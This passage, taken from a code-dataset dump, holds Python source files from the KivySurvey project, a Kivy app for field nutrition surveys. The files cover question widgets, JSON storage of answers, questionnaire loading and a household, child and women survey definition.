"MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14694, "license_type": "permissive", "max_line_length": 86, "num_lines": 437, "path": "/kivy_survey/surveyquestions.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import (BooleanProperty, ObjectProperty, StringProperty,\n NumericProperty, ReferenceListProperty, ListProperty)\nfrom flat_kivy.numpad import NumPad, DecimalNumPad\nfrom kivy.clock import Clock\nfrom kivy.utils import platform\nfrom flat_kivy.ui_elements import (TextInputFocus, \n CheckBoxListItem as CheckboxAnswerWidget, \n FlatPopup as Popup, FlatToggleButton)\nfrom kivy.lang import Builder\nfrom functools import partial\nfrom kivy.core.window import Window\nfrom kivy.uix.screenmanager import NoTransition, SlideTransition\nfrom flat_kivy.utils import construct_target_file_name\nBuilder.load_file(construct_target_file_name('surveyquestions.kv', __file__))\n\n\nclass SurveyQuestion(Widget):\n allow_no_answer = BooleanProperty(False)\n answer = ObjectProperty(None, allownone=True)\n question_name = StringProperty('default_question_name')\n question_text = StringProperty(None)\n validated = BooleanProperty(False)\n font_ramp_tuple = ListProperty(['question_default', '1'])\n 
do_transition = BooleanProperty(True)\n do_state = BooleanProperty(False)\n\n def __init__(self, **kwargs):\n super(SurveyQuestion, self).__init__(**kwargs)\n self._no_trans = NoTransition()\n self._slide_trans = SlideTransition()\n\n def on_validated(self, instance, value):\n do_transition = self.do_transition\n slide_trans = self._slide_trans\n no_trans = self._no_trans\n try:\n sm = self.ids.sm\n except:\n print(\"can't find sm class\")\n return\n if value:\n if do_transition:\n sm.transition = slide_trans\n sm.transition.direction = 'left'\n else:\n sm.transition = no_trans\n sm.current = 'inactive'\n else:\n if do_transition:\n sm.transition = slide_trans\n sm.transition.direction = 'right'\n else:\n sm.transition = no_trans\n sm.current = 'active'\n\n\n def on_touch_move(self, touch):\n super(SurveyQuestion, self).on_touch_move(touch)\n if self.collide_point(touch.x, touch.y) and self.do_state:\n bm = self.ids.back_manager\n if touch.dx < -15 and self.validated and bm.current == 'no_button':\n bm.transition.direction = 'left'\n bm.current = 'button'\n elif touch.dx > 15 and self.validated and bm.current == 'button':\n bm.transition.direction = 'right'\n bm.current = 'no_button' \n\n def unvalidate(self):\n bm = self.ids.back_manager\n bm.transition.direction = 'right'\n bm.current = 'no_button'\n self.validated = False\n\n def clear_question(self):\n self.answer = None\n self.unvalidate()\n\n def check_answered(self):\n if self.allow_no_answer:\n return True\n else:\n return self.answer is not None\n\n def _schedule_validate(self, dt):\n self._validate(self.validate_question())\n\n def _validate(self, validated):\n if validated:\n self.validated = True\n else:\n self.validated = False\n\n def _schedule_reset_do_transition(self, dt):\n self.do_transition = True\n\n def validate_question(self):\n return self.answer is not None\n\n def to_json(self):\n return self.answer\n\n def from_json(self, json_data):\n self.answer = json_data\n\n\nclass SurveyQuestionNumerical(SurveyQuestion):\n min_answer = NumericProperty(None, allownone=True)\n max_answer = NumericProperty(None, allownone=True)\n do_decimal = BooleanProperty(False)\n numpad_open_callback = ObjectProperty(None)\n do_state = BooleanProperty(True)\n units = StringProperty(None, allownone=True)\n\n\n def numpad_open_callback(self):\n self.kivysurvey.raise_numpad(self.question_text, self.numpad_return_callback,\n units=self.units, minimum=self.min_answer, maximum=self.max_answer,\n do_decimal=self.do_decimal)\n\n def numpad_return_callback(self, value, is_return):\n if value == 0 and is_return:\n value = None\n if is_return:\n Clock.schedule_once(self._schedule_validate, .2)\n self.answer = value\n\n def validate_question(self):\n min_answer = self.min_answer\n max_answer = self.max_answer\n answer = self.answer\n if answer is not None:\n if min_answer is not None and max_answer is not None:\n return min_answer < answer < max_answer\n elif min_answer is not None:\n return min_answer < answer\n elif max_answer is not None:\n return answer < max_answer\n else:\n return True\n else:\n return False\n\n\nclass SurveyQuestionBirthDate(SurveyQuestion):\n day = StringProperty(None, allownone=True)\n month = StringProperty(None, allownone=True)\n year = StringProperty(None, allownone=True)\n current_field = StringProperty(None, allownone=True)\n numpad = ObjectProperty(None)\n numpad_open_callback = ObjectProperty(None)\n numpad_close_callback = ObjectProperty(None)\n day_maximum_value = NumericProperty(31)\n do_state = 
BooleanProperty(True)\n answer = ReferenceListProperty(day, month, year)\n\n def __init__(self, **kwargs):\n super(SurveyQuestionBirthDate, self).__init__(**kwargs)\n\n def validate_question(self):\n return self.day is not None and (\n self.month is not None and self.year is not None)\n\n def check_answered(self):\n if self.allow_no_answer:\n return True\n else:\n return self.day is not None and (\n self.month is not None and self.year is not None)\n\n def to_json(self):\n return self.answer\n\n def from_json(self, json_data):\n self.set_answer(json_data)\n\n def set_answer(self, answer_value):\n try:\n self.day = answer_value[0]\n self.month = answer_value[1]\n self.year = answer_value[2]\n except:\n self.clear_question()\n \n def clear_question(self):\n self.day = None\n self.month = None\n self.year = None\n\n def on_year(self, instance, value):\n if self.month == '02':\n self.day_maximum_value = self.calculate_days_in_february()\n if self.day is not None and int(self.day) > self.day_maximum_value:\n self.day = None\n\n def calculate_days_in_february(self):\n year = self.year\n if year is not None:\n is_leap_year = False\n year = int(year)\n if year % 4 == 0 and not (year % 100 == 0 and year % 400 != 0):\n is_leap_year = True\n if is_leap_year:\n return 29\n else:\n return 28\n else:\n return 28\n\n def on_month(self, instance, value):\n months_with_31 = ['01', '03', '05', '07', '08', '10', '12']\n months_with_30 = ['04', '06', '09', '11']\n months_with_28 = ['02']\n if value in months_with_31:\n self.day_maximum_value = 31\n elif value in months_with_30:\n self.day_maximum_value = 30\n elif value in months_with_28:\n self.day_maximum_value = self.calculate_days_in_february()\n if self.day is not None and int(self.day) > self.day_maximum_value:\n self.day = None\n\n def open_numpad(self, field):\n self.current_field = field\n title = 'Input ' + field + ': '\n if field == 'day':\n maximum_value = self.day_maximum_value\n elif field == 'month':\n maximum_value = 12\n elif field == 'year':\n maximum_value = 3000\n self.kivysurvey.raise_numpad(title, self.numpad_return_callback,\n maximum=maximum_value,)\n\n def numpad_return_callback(self, value, is_return):\n current_field = self.current_field\n if current_field == 'day':\n if value < 10:\n self.day = '0' + str(value)\n if value == 0:\n self.day = None\n else:\n self.day = str(value)\n elif current_field == 'month':\n if value < 10:\n self.month = '0' + str(value)\n if value == 0:\n self.month = None\n else:\n self.month = str(value)\n elif current_field == 'year':\n if value == 0:\n self.year = None\n else:\n self.year = str(value)\n if is_return:\n self.current_field = None\n Clock.schedule_once(self._schedule_validate, .2)\n\n\nclass SurveyQuestionYesNo(SurveyQuestion):\n answer_group = StringProperty('Default Answers')\n answer1_text = StringProperty('Yes')\n answer2_text = StringProperty('No')\n do_state = BooleanProperty(True)\n no_answer_button = ObjectProperty(None)\n\n def __init__(self, **kwargs):\n super(SurveyQuestionYesNo, self).__init__(**kwargs)\n self.setup_no_answer_button()\n Clock.schedule_once(self.setup)\n\n def toggle_function(self, instance):\n buttons = instance.get_widgets(self.answer_group)\n is_button_down = False\n for button in buttons:\n if button.state == 'down':\n is_button_down = True\n self.answer = button.text\n if not is_button_down:\n 
self.answer = None\n self.answer_valid = is_button_down\n del buttons\n Clock.schedule_once(self._schedule_validate, .2)\n\n def clear_question(self):\n for button in self.answer_layout.children:\n\n button.state = 'normal'\n\n def setup(self, dt):\n pass\n\n def from_json(self, json_data):\n self.set_answer(json_data)\n\n def set_answer(self, new_value):\n self.answer = new_value\n for button in self.answer_layout.children:\n if button.text == new_value:\n button.state = 'down'\n\n def setup_no_answer_button(self):\n self.no_answer_button = no_answer_button = FlatToggleButton(\n text='No Answer', group=self.answer_group, \n on_release=self.toggle_function,\n no_up=True,\n theme=('blue', 'variant_3'),\n height='80dp',\n max_lines=1,\n font_ramp_tuple=self.font_ramp_tuple,\n size_hint=(1., None),)\n \n if self.allow_no_answer:\n self.bind(font_ramp_tuple=no_answer_button.setter(\n 'font_ramp_tuple'))\n self.answer_layout.add_widget(no_answer_button)\n\n def on_answer_group(self, instance, value):\n if self.no_answer_button is not None:\n self.no_answer_button.group = value\n\n def on_allow_no_answer(self, instance, value):\n no_answer_button = self.no_answer_button\n try:\n answer_layout = self.ids.answer_layout\n except:\n Clock.schedule_once(lambda x: partial(\n self.on_allow_no_answer, instance, value), .1)\n return\n if value and no_answer_button not in answer_layout.children:\n answer_layout.add_widget(no_answer_button)\n else:\n if no_answer_button in answer_layout.children:\n answer_layout.remove_widget(no_answer_button)\n\n\nclass SurveyQuestionToggle(SurveyQuestion):\n answer_group = StringProperty('Default Answers')\n button = ObjectProperty(None)\n answer_text = StringProperty('Yes')\n\n def __init__(self, **kwargs):\n super(SurveyQuestionToggle, self).__init__(**kwargs)\n\n def toggle_function(self, instance):\n button = self.button\n if button.state == 'down':\n self.answer = True\n else:\n self.answer = False\n\n def clear_question(self):\n self.button.state = 'normal'\n\n\nclass SurveyQuestionTextInput(SurveyQuestion):\n text_input = ObjectProperty(None)\n do_state = BooleanProperty(True)\n\n def __init__(self, **kwargs):\n super(SurveyQuestionTextInput, self).__init__(**kwargs)\n Clock.schedule_once(self.setup)\n\n def setup(self, dt):\n self.setup_textinput_popup()\n\n def setup_textinput_popup(self):\n self.text_input = text_input = TextInputFocus()\n self.text_input_popup = popup = Popup(title='Input Name', \n size_hint=(1.0, 1.0), content=text_input)\n text_input.bind(text=self.setter('answer'))\n text_input.close_callback = self.close\n text_input.texti.bind(focus=self.on_focus)\n\n def close(self):\n self.text_input_popup.dismiss()\n Window.release_all_keyboards()\n Clock.schedule_once(self._schedule_validate, .2)\n\n def on_focus(self, instance, value):\n if not value:\n Window.release_all_keyboards()\n\n def clear_question(self):\n self.text_input.texti.text = ''\n self.answer = None\n\n\nclass CheckboxQuestion(SurveyQuestion):\n answers = ListProperty(None)\n group = StringProperty('')\n answer_layout = ObjectProperty(None)\n font_ramp_tuple = ListProperty(['default', '1'])\n\n def on_group(self, instance, value):\n self.on_answers(None, self.answers)\n\n def on_answer_layout(self, instance, value):\n if value is not None:\n self.on_answers(None, self.answers)\n\n def on_answers(self, instance, value):\n answer_layout = self.answer_layout\n if answer_layout is not None:\n answer_layout.clear_widgets()\n for answer in value:\n answer_wid = CheckboxAnswerWidget(\n 
text=answer, group=self.group, size_hint=(1.0, .25),\n theme=('blue', 'variant_3'), font_ramp_tuple=self.font_ramp_tuple)\n self.bind(font_ramp_tuple=answer_wid.setter('font_ramp_tuple'))\n answer_layout.add_widget(answer_wid)\n answer_wid.bind(active=self.set_answer)\n\n def from_json(self, json_data):\n for each in self.answer_layout.children:\n if each.text == json_data:\n each.toggle_checkbox()\n\n\n def set_answer(self, instance, value):\n if value:\n self.answer = instance.text\n else:\n self.answer = None\n\n def clear_question(self):\n for each in self.answer_layout.children:\n each.ids.checkbox.active = False\n" }, { "alpha_fraction": 0.5364280939102173, "alphanum_fraction": 0.5382011532783508, "avg_line_length": 35.92856979370117, "blob_id": "4cf1260daf862911eecd60acba0869f50476f8b4", "content_id": "0c1ff886b0bcb5e8a5cf011615f9d9213afa185b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6204, "license_type": "permissive", "max_line_length": 78, "num_lines": 168, "path": "/kivy_survey/dbinterface.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\nfrom datetime import datetime, timedelta, date\nfrom kivy.storage.jsonstore import JsonStore\nfrom kivy.clock import Clock\n\nclass DBInterface(object):\n\n def __init__(self, kivysurvey, **kwargs):\n super(DBInterface, self).__init__(**kwargs)\n date = self.convert_time_to_json_ymd(self.get_time())\n self.data = data = JsonStore('data/' + date + '.json')\n self.reset_timers = reset_timers = JsonStore('data/reset_timers.json')\n if 'survey_data' not in data:\n data['survey_data'] = {}\n self.kivysurvey = kivysurvey\n #We will preserve entry 0 for application and configuration data\n self.subject_ids = 1\n sub_id = self.get_entry(0, 'data', 'config', 'subject_ids')\n if sub_id is not None:\n self.subject_ids = sub_id\n self.sync = Clock.create_trigger(self.trigger_sync)\n self.check_reset()\n\n def check_reset(self):\n reset_timers = self.reset_timers\n current_time = self.get_time()\n keys_to_del = []\n for each in reset_timers:\n expire_time = self.convert_time_from_json(each)\n if expire_time < current_time:\n data = reset_timers[each]\n self.set_entry(data['subject_id'], data['questionnaire'], \n data['page'], data['question'], None)\n keys_to_del.append(each)\n for key in keys_to_del:\n reset_timers.delete(key)\n \n\n def trigger_sync(self, dt):\n data = self.data\n data._is_changed = True\n data.store_sync()\n\n def get_entry(self, subject_id, questionnaire, page, question):\n data = self.data['survey_data']\n try:\n return data[str(\n subject_id)][questionnaire][page][question]['answer']\n except:\n return None\n\n def get_subjects(self, subject_id, questionnaire):\n data = self.data['survey_data']\n survey = self.kivysurvey.survey\n q = survey.questionnaires[questionnaire]\n if hasattr(q, 'demographic'):\n real_questionnaire = q.demographic\n else:\n real_questionnaire = questionnaire\n try:\n questionnaire_data = data[str(subject_id)][real_questionnaire]\n except:\n return []\n try:\n original_subjects = questionnaire_data['subjects']\n except: \n return []\n if hasattr(q, 'demographic_restrictions'):\n restrictions = q.demographic_restrictions\n subjects_to_return = []\n sub_a = subjects_to_return.append\n for each in original_subjects:\n status = True\n for restric in restrictions:\n data = self.get_entry(each, restric[0], restric[1], \n restric[2])\n restric_type = 
type(restric[3])\n if restric_type is list:\n minimum, maximum = restric[3]\n if not minimum <= data <= maximum:\n status = False\n\n elif restric_type is unicode:\n if not data == restric[3]:\n status = False\n if status:\n sub_a(each)\n return subjects_to_return\n else:\n return original_subjects\n\n\n def add_subject(self, subject_id, questionnaire, subject_id_to_add):\n data = self.data['survey_data']\n subject_id = str(subject_id)\n if subject_id not in data:\n data[subject_id] = subject_data = {}\n else:\n subject_data = data[subject_id]\n if questionnaire not in subject_data:\n subject_data[questionnaire] = q_data = {'subjects': []}\n else:\n q_data = subject_data[questionnaire]\n q_data['subjects'].append(subject_id_to_add)\n\n def get_unique_id(self):\n ret_id = self.subject_ids\n self.subject_ids += 1\n self.set_entry(0, 'data', 'config', 'subject_ids', self.subject_ids)\n return ret_id\n\n def set_entry(self, subject_id, questionnaire, page, question, answer, \n do_reset=False, reset_in_hours=None):\n data = self.data['survey_data']\n s_id = str(subject_id)\n if s_id not in data:\n data[s_id] = subject_data = {}\n else:\n subject_data = data[s_id]\n if questionnaire not in subject_data:\n subject_data[questionnaire] = q_data = {}\n else:\n q_data = subject_data[questionnaire]\n if page not in q_data:\n q_data[page] = page_data = {}\n else:\n page_data = q_data[page]\n if question not in page_data:\n page_data[question] = q_data = {'answer': None, 'history': {}}\n else:\n q_data = page_data[question]\n if q_data['answer'] != answer:\n time = self.get_time()\n time_stamp = self.convert_time_to_json(time)\n q_data['history'][time_stamp] = answer\n q_data['answer'] = answer\n \n self.sync()\n if do_reset:\n timed = timedelta(hours=reset_in_hours)\n expire_time = time + timed\n expires_at = self.convert_time_to_json(expire_time)\n reset_timers = self.reset_timers\n reset_timers[expires_at] = {'subject_id': subject_id, \n 'questionnaire': questionnaire,\n 'page': page,\n 'question': question}\n\n def get_time(self):\n return datetime.utcnow()\n\n def convert_time_to_json_ymd(self, datetime):\n if datetime is not None:\n return datetime.strftime('%Y-%m-%d')\n else:\n return None\n\n def convert_time_to_json(self, datetime):\n if datetime is not None:\n return datetime.strftime('%Y-%m-%dT%H:%M:%S')\n else:\n return None\n\n def convert_time_from_json(self, jsontime):\n if jsontime is not None:\n return datetime.strptime(jsontime, '%Y-%m-%dT%H:%M:%S')\n else:\n return None\n" }, { "alpha_fraction": 0.5912644267082214, "alphanum_fraction": 0.5943235754966736, "avg_line_length": 32.81609344482422, "blob_id": "ab54ad617af7ed77a0c1f1422be49ea23931fb20", "content_id": "a926f9e948cb38f504a0eddcfaffb7526ddd704c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5884, "license_type": "permissive", "max_line_length": 81, "num_lines": 174, "path": "/kivy_survey/survey.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\nfrom jsontowidget import widget_from_json\n\n\nclass Survey(object):\n def __init__(self, json_survey, **kwargs):\n super(Survey, self).__init__(**kwargs)\n self.survey_file = json_survey\n self.questionnaires = {}\n self.prev_questionnaires = []\n self.load_questionnaires()\n\n def load_questionnaires(self):\n json_data = self.survey_file['survey']\n qs = self.questionnaires\n for each in json_data:\n qs[each] = Questionnaire(each, 
self)\n\n def get_header_definitions(self, questionnaire):\n q = self.questionnaires[questionnaire]\n return q.headers\n\n def get_subject_fields(self, questionnaire):\n q = self.questionnaires[questionnaire]\n return q.subject_fields\n\n def get_next_page(self, questionnaire, current_page):\n q = self.questionnaires[questionnaire]\n page_order = q.page_order\n if current_page is None:\n return page_order[0]\n else:\n index = page_order.index(current_page)\n if index+1 < len(page_order):\n return page_order[index+1]\n else:\n return None\n\n def get_prev_page(self, questionnaire, current_page):\n q = self.questionnaires[questionnaire]\n page_order = q.page_order\n if current_page is None:\n return page_order[-1]\n else:\n index = page_order.index(current_page)\n if index-1 >= 0:\n return page_order[index-1]\n else:\n return None\n\n def get_next_questionnaire(self, current_questionnaire):\n q = self.questionnaires[current_questionnaire]\n return q.next_questionnaire\n\n def get_allow_forward(self, current_questionnaire):\n q = self.questionnaires[current_questionnaire]\n return q.allow_forward\n\n def store_current_questionnaire(self, current_questionnaire):\n self.prev_questionnaires.append(current_questionnaire) \n\n def get_previous_questionnaire(self):\n try:\n return self.prev_questionnaires[-1]\n except:\n return None\n\n def pop_previous_questionnaire(self):\n try:\n return self.prev_questionnaires.pop()\n except:\n return None\n\n def get_allow_add_subjects(self, questionnaire):\n try:\n return self.questionnaires[questionnaire].add_subjects\n except:\n return False\n\n \n\nclass Questionnaire(object):\n\n def __init__(self, name, survey, **kwargs):\n super(Questionnaire, self).__init__(**kwargs)\n self.survey = survey\n self.page_order = []\n self.headers = []\n self.name = name\n json_data = survey.survey_file['survey'][name]\n self.load_pages(name, survey)\n self.load_headers(name, survey)\n self.load_subject_fields(name, survey)\n if 'next_questionnaire' in json_data:\n self.next_questionnaire = json_data[\"next_questionnaire\"]\n else:\n self.next_questionnaire = None\n if 'add_subjects' in json_data:\n self.add_subjects = json_data[\"add_subjects\"]\n else:\n self.add_subjects = False\n if 'allow_forward' in json_data:\n self.allow_forward = json_data[\"allow_forward\"]\n else:\n self.allow_forward = False\n if 'demographic' in json_data:\n self.demographic = json_data['demographic']\n if 'demographic_restrictions' in json_data:\n self.demographic_restrictions = json_data['demographic_restrictions']\n\n\n def load_subject_fields(self, name, survey):\n json_data = survey.survey_file['survey'][name]\n self.subject_fields = json_data['subject_fields']\n\n def load_headers(self, name, survey):\n json_data = survey.survey_file['survey'][name]\n self.headers = json_data['headers']\n\n def load_pages(self, name, survey):\n json_data = survey.survey_file['survey'][name]\n pages_json = json_data['pages']\n pages = self.pages = {}\n self.page_order = json_data['page_order']\n for each in pages_json:\n p = Page(each, name, survey)\n pages[each] = p\n\n\nclass Page(object):\n\n def __init__(self, name, questionnaire_name, survey, **kwargs):\n super(Page, self).__init__(**kwargs)\n self.q_name = questionnaire_name\n self.survey = survey\n self.name = name\n self.question_order = []\n self.load_questions(name, questionnaire_name, survey)\n\n def load_questions(self, name, q_name, survey):\n json_data = survey.survey_file['survey'][q_name]['pages'][name]\n questions_json = 
json_data['questions']\n questions = self.questions = {}\n self.question_order = json_data['question_order']\n if 'disable_binds' in json_data:\n self.disable_binds = disable_binds = json_data['disable_binds']\n else:\n self.disable_binds = disable_binds = []\n for each in questions_json:\n q = Question(each, questions_json[each])\n questions[each] = q\n for bind in disable_binds:\n a, b = bind\n q1 = questions[a]\n q2 = questions[b]\n wid1 = q1.widget\n wid2 = q2.widget\n wid1.bind(answer=q2.call_disable_bind)\n wid2.bind(answer=q1.call_disable_bind)\n \n\n\nclass Question(object):\n \n def __init__(self, question_name, question_json, **kwargs):\n super(Question, self).__init__(**kwargs)\n self.widget = wid = widget_from_json(question_json)\n wid.question_name = question_name\n\n def call_disable_bind(self, instance, value):\n if instance.validate_question():\n self.widget.disabled = True\n else:\n self.widget.disabled = False\n" }, { "alpha_fraction": 0.5297189354896545, "alphanum_fraction": 0.5355552434921265, "avg_line_length": 25.47154426574707, "blob_id": "dd5750a2a0febeb9b3e0743b7a5dfe5e7edf94f7", "content_id": "ec05b763af6b6a004e4df3a02f7314773bbfba3f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6511, "license_type": "permissive", "max_line_length": 72, "num_lines": 246, "path": "/kivy_survey/surveydata.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "import kivy\nfrom kivy.storage.jsonstore import JsonStore\n\nsurvey = {\n\t\"household_questionnaire\": \n\t\t{\"pages\": {\"household1\": \n\t\t\t{\"questions\": \n\t\t\t\t{\"household_id\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Enter Household ID: \"\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}, \n\t\t\t\"question_order\": [\"household_id\", ]},\n\t\t\t}, \n\t\t\"page_order\": [\"household1\", ],\n\t\t\"headers\": [('Enter Households for Cluster', \n\t\t\t('data', 'cluster', 'current_cluster'))],\n\t\t\"next_questionnaire\": \"add_member\",\n\t\t\"allow_forward\": False,\n\t\t\"add_subjects\": True,\n\t\t\"subject_fields\": ['Household', \n\t\t\t('household_questionnaire', 'household1', 'household_id')]\n\t\t},\n\t\"add_member\":\n\t\t{\"pages\": {\"addmember1\": \n\t\t\t{\"questions\": \n\t\t\t\t{\"name\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionTextInput\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Enter Name: \"\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"age\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Age in completed years: \"\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"gender\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Gender: \",\n\t\t\t\t\t\t\"answer_group\": 'gender',\n\t\t\t\t\t\t\"answer1_text\": 'M',\n\t\t\t\t\t\t'answer2_text': 'F',\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"status\": \n\t\t\t\t\t{\"type\": \"CheckboxQuestion\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Status: \",\n\t\t\t\t\t\t\"group\": 'born_joined',\n\t\t\t\t\t\t\"answers\": ['Born during recall period', \n\t\t\t\t\t\t\t'Joined household during recall period'],\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t}, \n\t\t\t\"question_order\": [\"name\", \"age\", \"gender\", \"status\"]},\n\t\t\t},\n\t\t\"page_order\": [\"addmember1\"],\n\t\t\"add_subjects\": True,\n\t\t\"allow_forward\": 
True,\n\t\t\"next_questionnaire\": \"child_survey\",\n\t\t\"headers\": [('Add Member for Household', \n\t\t\t('household_questionnaire', 'household1', 'household_id'))],\n\t\t\"subject_fields\": [('add_member', 'addmember1', 'name'), \n\t\t\t('add_member', 'addmember1', 'age'),\n\t\t\t('add_member', 'addmember1', 'gender')]\n\t\t},\n\t\"child_survey\":\n\t\t{\"pages\": {\"child_survey1\": \n\t\t\t{\"questions\": \n\t\t\t\t{\"birthdate\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionBirthDate\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Enter Date of Birth: \"\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"age_in_months\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Age in Months: \",\n\t\t\t\t\t\t\"do_decimal\": False,\n\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"weight\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record Weight: \",\n\t\t\t\t\t\t\"units\": \"kg\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"height\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record Height: \",\n\t\t\t\t\t\t\"units\": \"cm\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"height_type\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Type of Height Measurement: \",\n\t\t\t\t\t\t\"answer1_text\": 'Child Standing (Height)',\n\t\t\t\t\t\t\"answer2_text\": 'Child Recumbent (Length)',\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"muac\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record MUAC: \",\n\t\t\t\t\t\t\"units\": \"mm\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"edema\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Is Bilateral Edema Present?\",\n\t\t\t\t\t\t\"answer_group\": 'edema_question'\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t}, \n\t\t\t\"question_order\": [\"birthdate\", \"age_in_months\", \"weight\", \"height\", \n\t\t\t\t\"height_type\",\"muac\", \"edema\"],\n\t\t\t\"disable_binds\": [(\"birthdate\", \"age_in_months\")],},\n\t\t\t\"child_survey2\": \n\t\t\t\t{\"questions\":\n\t\t\t\t{\"diarrhoea\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \n\t\t\t\t\t\t\t\"In the last two weeks, has the child had diarrhoea?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"question_order\": ['diarrhoea']\n\t\t\t},\n\t\t\t},\n\t\t\"page_order\": [\"child_survey1\", 'child_survey2'],\n\t\t\"add_subjects\": False,\n\t\t\"allow_forward\": True,\n\t\t\"demographic_restrictions\": [('add_member', \n\t\t\t'addmember1', 'age', (0, 6))],\n\t\t\"demographic\": 'add_member',\n\t\t\"next_questionnaire\": \"women_survey\",\n\t\t\"headers\": [('Child Survey for Household', \n\t\t\t('household_questionnaire', 'household1', 'household_id'))],\n\t\t\"subject_fields\": [('add_member', 'addmember1', 'name'), \n\t\t\t('add_member', 'addmember1', 'age'),\n\t\t\t('add_member', 'addmember1', 'gender')]\n\t\t},\n\t\"women_survey\":\n\t\t{\"pages\": {\"women_survey1\": \n\t\t\t{\"questions\": \n\t\t\t\t{\"weight\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record Weight: \",\n\t\t\t\t\t\t\"units\": 
\"kg\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"height\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record Weight: \",\n\t\t\t\t\t\t\"units\": \"cm\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"muac\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record MUAC: \",\n\t\t\t\t\t\t\"units\": \"mm\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"pregnant\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Are you currently pregnant?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t\"answer_group\": 'pregnant_question',\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"breastfeeding\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Are you currently breastfeeding?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t\"answer_group\": 'breastfeeding_question',\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t}, \n\t\t\t\"question_order\": [\"weight\", \"height\", \"muac\", \n\t\t\t\"pregnant\", \"breastfeeding\"],},\n\t\t\"women_survey2\": \n\t\t\t{\"questions\":\n\t\t\t\t{\"ever_pregnant\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": 